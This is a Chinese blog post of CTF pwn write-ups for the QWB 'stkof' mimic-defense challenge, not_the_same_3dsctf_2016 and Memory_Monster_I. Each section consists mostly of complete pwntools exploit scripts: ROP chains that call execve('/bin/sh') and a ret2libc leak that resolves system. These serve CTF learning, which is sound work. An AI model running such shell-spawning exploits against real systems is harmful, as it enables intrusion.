强网杯 stkof 拟态防御&not_the_same_3dsctf_2016

最新推荐文章于 2023-03-18 11:24:34 发布
最新推荐文章于 2023-03-18 11:24:34 发布
阅读量236 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44113469/article/details/113744425
版权

强网杯 stkof 拟态防御

之前强网杯的一道简单题,栈溢出,俩程序,静态编译

ropchain 一梭子getshell,因为是拟态防御,所以必须一个payload 同时打俩程序,熟悉rop链构造,就很愉快,否则就比较尴尬。

exp:

from pwn import *
#p=remote
p=process("./pwn2")st
p.recvuntil('try to pwn it?\n')

rop32=''
rop32+=struct.pack('<I', 0x0806e9cb) # porop64edx ; ret
rop32+=struct.pack('<I', 0x080d9060) # @ .data
rop32+=struct.pack('<I', 0x080a8af6) # porop64eax ; ret
rop32+= '/bin'
rop32+=struct.pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
rop32+=struct.pack('<I', 0x0806e9cb) # porop64edx ; ret
rop32+=struct.pack('<I', 0x080d9064) # @ .data + 4
rop32+=struct.pack('<I', 0x080a8af6) # porop64eax ; ret
rop32+= '//sh'
rop32+=struct.pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
rop32+=struct.pack('<I', 0x0806e9cb) # porop64edx ; ret
rop32+=struct.pack('<I', 0x080d9068) # @ .data + 8
rop32+=struct.pack('<I', 0x08056040) # xor eax, eax ; ret
rop32+=struct.pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
rop32+=struct.pack('<I', 0x080481c9) # porop64ebx ; ret
rop32+=struct.pack('<I', 0x080d9060) # @ .data
rop32+=struct.pack('<I', 0x0806e9f2) # porop64ecx ; porop64ebx ; ret
rop32+=struct.pack('<I', 0x080d9068) # @ .data + 8
rop32+=struct.pack('<I', 0x080d9060) # padding without overwrite ebx
rop32+=struct.pack('<I', 0x0806e9cb) # porop64edx ; ret
rop32+=struct.pack('<I', 0x080d9068) # @ .data + 8
rop32+=struct.pack('<I', 0x08056040) # xor eax, eax ; ret
rop32+=struct.pack('<I', 0x0807be5a) # inc eax ; ret
rop32+=struct.pack('<I', 0x0807be5a) # inc eax ; ret
rop32+=struct.pack('<I', 0x0807be5a) # inc eax ; ret
rop32+=struct.pack('<I', 0x0807be5a) # inc eax ; ret
rop32+=struct.pack('<I', 0x0807be5a) # inc eax ; ret
rop32+=struct.pack('<I', 0x0807be5a) # inc eax ; ret
rop32+=struct.pack('<I', 0x0807be5a) # inc eax ; ret
rop32+=struct.pack('<I', 0x0807be5a) # inc eax ; ret
rop32+=struct.pack('<I', 0x0807be5a) # inc eax ; ret
rop32+=struct.pack('<I', 0x0807be5a) # inc eax ; ret
rop32+=struct.pack('<I', 0x0807be5a) # inc eax ; ret
rop32+=struct.pack('<I', 0x080495a3) # int 0x80

rop64= ''
rop64+=struct.pack('<Q', 0x0000000000405895) # porop64rsi ; ret
rop64+=struct.pack('<Q', 0x00000000006a10e0) # @ .data
rop64+=struct.pack('<Q', 0x000000000043b97c) # porop64rax ; ret
rop64+= '/bin//sh'
#p+='cat /flag'
rop64+=struct.pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
rop64+=struct.pack('<Q', 0x0000000000405895) # porop64rsi ; ret
rop64+=struct.pack('<Q', 0x00000000006a10e8) # @ .data + 8
rop64+=struct.pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret
rop64+=struct.pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
rop64+=struct.pack('<Q', 0x00000000004005f6) # porop64rdi ; ret
rop64+=struct.pack('<Q', 0x00000000006a10e0) # @ .data
rop64+=struct.pack('<Q', 0x0000000000405895) # porop64rsi ; ret
rop64+=struct.pack('<Q', 0x00000000006a10e8) # @ .data + 8
rop64+=struct.pack('<Q', 0x000000000043b9d5) # porop64rdx ; ret
rop64+=struct.pack('<Q', 0x00000000006a10e8) # @ .data + 8
rop64+=struct.pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret
rop64+=struct.pack('<Q', 0x000000000043b97c) # porop64rax ; ret
rop64+= p64(59)
rop64+=struct.pack('<Q', 0x000000000046713f) # syscall


add_esp_xc=0x080a8f69
add_esp_d8 =0x4079d4

payload = 'aaa'.ljust(0x110,"\x00") + p64(add_esp_xc)+p64(add_esp_d8)+rop32.ljust(0xd8,"\x00")+rop64
p.sendline(payload)
p.interactive()

64位的rop 注意一下porop64rax ; ret 直接用ROPgadget 搞出来的ropchain老长,get不了shell,改一下那个连续的置rax的那段才行。

not_the_same_3dsctf_2016

gets函数,静态编译

exp:

 #!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from sys import *
from struct import pack
debug=0

context.log_level='debug'
context.arch='i386'

if debug:
    p=process("./not_the_same_3dsctf_2016")
    gdb.attach(p, "b*0x8048A00")
else:
    host = "node3.buuoj.cn"
    port =25479
    p=remote(host, port)
	# Padding goes here
payload = 'a'*0x2d
payload +=struct.pack('<I', 0x0806fcca) # pop edx ; ret
payload +=struct.pack('<I', 0x080eb060) # @ .data
payload +=struct.pack('<I', 0x08048b0b) # pop eax ; ret
payload += '/bin'
payload +=struct.pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
payload +=struct.pack('<I', 0x0806fcca) # pop edx ; ret
payload +=struct.pack('<I', 0x080eb064) # @ .data + 4
payload +=struct.pack('<I', 0x08048b0b) # pop eax ; ret
payload += '//sh'
payload +=struct.pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
payload +=struct.pack('<I', 0x0806fcca) # pop edx ; ret
payload +=struct.pack('<I', 0x080eb068) # @ .data + 8
payload +=struct.pack('<I', 0x08049423) # xor eax, eax ; ret
payload +=struct.pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
payload +=struct.pack('<I', 0x080481ad) # pop ebx ; ret
payload +=struct.pack('<I', 0x080eb060) # @ .data
payload +=struct.pack('<I', 0x0806fcf1) # pop ecx ; pop ebx ; ret
payload +=struct.pack('<I', 0x080eb068) # @ .data + 8
payload +=struct.pack('<I', 0x080eb060) # padding without overwrite ebx
payload +=struct.pack('<I', 0x0806fcca) # pop edx ; ret
payload +=struct.pack('<I', 0x080eb068) # @ .data + 8
payload +=struct.pack('<I', 0x08049423) # xor eax, eax ; ret
payload +=struct.pack('<I', 0x0807b2af) # inc eax ; ret
payload +=struct.pack('<I', 0x0807b2af) # inc eax ; ret
payload +=struct.pack('<I', 0x0807b2af) # inc eax ; ret
payload +=struct.pack('<I', 0x0807b2af) # inc eax ; ret
payload +=struct.pack('<I', 0x0807b2af) # inc eax ; ret
payload +=struct.pack('<I', 0x0807b2af) # inc eax ; ret
payload +=struct.pack('<I', 0x0807b2af) # inc eax ; ret
payload +=struct.pack('<I', 0x0807b2af) # inc eax ; ret
payload +=struct.pack('<I', 0x0807b2af) # inc eax ; ret
payload +=struct.pack('<I', 0x0807b2af) # inc eax ; ret
payload +=struct.pack('<I', 0x0807b2af) # inc eax ; ret
payload +=struct.pack('<I', 0x0806d8a5) # int 0x80

p.sendline(payload)
p.interactive()

安恒月赛

Memory_Monster_I

exp:

from pwn import *
from sys import *
debug=1
context.log_level='debug'
context.arch='amd64'

if debug:
    p=remote("183.129.189.60",10083)#process("./Memory_Monster_I")#
    lib =ELF("./libc6_2.30-0ubuntu2_amd64.so") #ELF('/lib/x86_64-linux-gnu/libc.so.6')# 
else:
    host = argv[1]
    port = int(argv[2])
    p=remote(host, port)
put_got = 0x404018
read_got = 0x404038
put_plt = 0x401030
pop_rdi = 0x4012bb
main = 0x401172
ret = 0x401248
door = 0x40124A
write_got = 0x404020
stack_got = p64(0x404028)+'a'*0x30+p64(pop_rdi)+p64(0x404040)+p64(put_plt)+p64(main)
p.recvuntil("addr:")
p.sendline(stack_got)
boor = p64(ret)
p.recvuntil("data:")
p.sendline(boor)

lib_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00")) - 0x087d50#- lib.symbols['puts']
print "lib:"+hex(lib_base)

sys = lib_base +lib.symbols['system']#0x0554e0
bin = lib_base +lib.search('/bin/sh').next()
ogg = lib_base +0x45216#
pay =  p64(0x404028)+'a'*0x30+p64(ret)+p64(pop_rdi)+p64(bin)+p64(sys)+p64(sys)
#pay =  p64(0x404028)+'a'*0x30+p64(ogg)+p64(ogg)+p64(ogg)

p.recvuntil("addr:")
p.sendline(pay)
boor = p64(ret)
p.recvuntil("data:")
p.sendline(boor)
p.interactive()

给的后门函数用不了,远程的libc 版本查不到??去si。冷静冷静。。心态要好

梦回Altay
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php upload ctf,强网杯CTF防御赛ez_upload Writeup
weixin_35645813的博客
03-17 1116
这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家。ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型的ctf式题目(虽然现在大家都很抵制这样的题目),这里主要是分享Writeup以及我们队在完成题目时的思考流程。ez_upload 思考流程最开始我先描述一下题目逻辑。1、login.php,登陆页面,...
强网杯2019 拟态 STKOF
z1r0的博客
02-25 4325
强网杯2019 拟态 STKOF 查看保护 栈溢出漏洞,但是这里加上了一个拟态防御拟态防御其实就是对比32位和64位的输出或者看哪个程序crash掉,不一样则报错。 通俗易懂的来说其实就是exp可能打通过32位又可以打通过64位。 攻击思路:这一题目的话只是一个简单的栈溢出漏洞。又是静态链接来的所以可以找到很多的gadgets。这里的32位和64的payload直接用ropgadget生成的。改一下重复的就行了p += pack('<I', 0x080a8af6) # pop eax ; ret
[Writeup]2021强网拟态 Give_me_your_0day
feng的博客
10-29 527
前言 当时没能做出来,当时想到了mysql恶意服务端读取文件,但是没能读成功,不知道是为什么。今天看到Firebasky师傅的github更新了writeup,也是学习了一波。 解法1 当时没有拿Seay去扫,单纯的自己肉眼审install.php。自己审这种前后端没有分离的代码,只会去看不涉及到前端的PHP代码,就出了问题,遗漏了漏洞。 拿Seay扫一下第一条就能扫到,install.php608行的这个文件包含漏洞: <?php requir
第四届“强网”拟态防御国际精英挑战赛_wp(下)
蚁景网安学院
10-29 1282
Crypto签到flag{GaqY7KtEtrVIX1Q5oP5iEBRCYXEAy8rT}Web1、zerocalc读到readFile('./src/index.js') = cons...
2022强网拟态pwn-webheap_revenge
z1r0的博客
11-21 210
这里的n会就是src里面的长度,没有限制大小,所以memcpy到dest中的时候就会发生堆溢出。笔者用的2.31的libc,这题不能直接用one_gadget了,需要打成system。通过堆溢打fd为hook,打hook为system即可。这个和上个题差不多,uaf变成了堆溢出。
【2022强网拟态】windows_call
最新发布
Kamusz的博客
03-18 222
【2022强网拟态】windows_call Z3 SOLVE + APINAME HOOK + AES ECB + 十六进制数据转字符拼接 + XOR
延期公告 | 第五届“强网”拟态防御国际精英挑战赛
Cyberpeace的博客
11-09 333
大赛延期举办
第四届“强网”拟态防御国际精英挑战赛_wp(上)
蚁景网安学院
10-28 747
Re1、fastjs提取字节码/* File generated automatically by the QuickJS compiler. */ #include "quickjs...
第五届“强网”拟态防御国际精英挑战赛——线上预选赛火热开赛!
Cyberpeace的博客
11-04 449
截至2022年,第五届“强网”拟态防御国际精英挑战赛已累积接受全球万余支战队、数十万人次的参与!
第四届“强网”拟态防御国际精英挑战赛.zip
12-07
拟态防御 CTF 国际精英挑战赛
内生安全与拟态防御PPT
09-05
内生安全与拟态防御PPT 内生安全是指一种对象模型拥有广义鲁棒控制构造,能在不依赖关于攻击者先验知识和行为特征信息的情况下,将基于模型内部漏洞后门等“暗功能”的不确定扰动,归一化为可用概率表达的传统可靠...
一种基于拟态防御的差异化反馈调度判决算法
01-19
面对服务路径的安全性问题,根据拟态防御理论里的基于动态异构冗余(dynamic heterogeneous redundancy,DHR)模型的服务功能链部署拟态防御体系架构,并结合服务路径部署的实际需求,提出了一种基于拟态防御的差异...
针对物理访问控制的拟态防御认证方法
01-13
针对传统物理访问控制系统的认证方法易受攻击的安全问题,基于拟态防御技术及其动态异构冗余架构(DHR)原理,以移动端二维码为接口、以动态口令为内核设计了一种拟态防御认证方法。首先,构建认证服务器的执行体池...
拟态防御原理介绍.pdf
09-05
拟态防御原理】 拟态防御是一种网络安全防御策略,它源于对生物免疫系统非特异性与特异性免疫机制的借鉴,旨在解决当前网络空间防御中面临的严重不对称性问题。在数字时代,网络空间安全成为了全球关注的重要议题...
2019XCTF攻防世界之萌新入坑(time_formatter)
weixin_44113469的博客
04-11 1879
time_formatter
2019西湖论剑writeup
weixin_44113469的博客
04-07 1803
pwn 0x01 story 保护 开启了NX,canary 题目分析 明显的格式化字符漏洞,用来泄露canary的值,直观思路 v1控制写入s的数量,可以控制v1使s溢出,控制ret返回puts,泄露某个函数地址,计算出libc基址,算出system,str_bin_sh。再次溢出,getshell。 # -*- coding:utf-8 -*- from pwn import *...
2019XCTF攻防世界之萌新入坑
weixin_44113469的博客
04-06 1624
XCTF攻防世界的题质量确实很高,还有解题思路和writeup,真是棒极了。 萌新入坑 0x01 babystack 保护机制 题目开启了nx,canary 题目代码 思路分析 ①这道题主要是绕过canary,然后栈溢出getshell。 ②经分析,read函数读入到s处,可以溢出。 ③put函数输出s的内容,遇到’\x00’才停止,即使字符串中存在’\n’,也会继续输出,用...
格式化字符串漏洞利用之泄露canary
weixin_44113469的博客
03-31 1514
两道格式化字符串漏洞利用入门题,绕过canary的一种姿势,不知道写的对不对,请大家多指正。 0x01 Canary 保护 开启了NX和canary。 题目分析 有个getshell函数,vuln函数里面明显的栈溢出和格式化字符串漏洞,所以可以利用printf函数泄露出canary的值,然后利用栈溢出填充canary,控制返回指针执行getshell函数。 栈 从栈的情况看,var_8...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值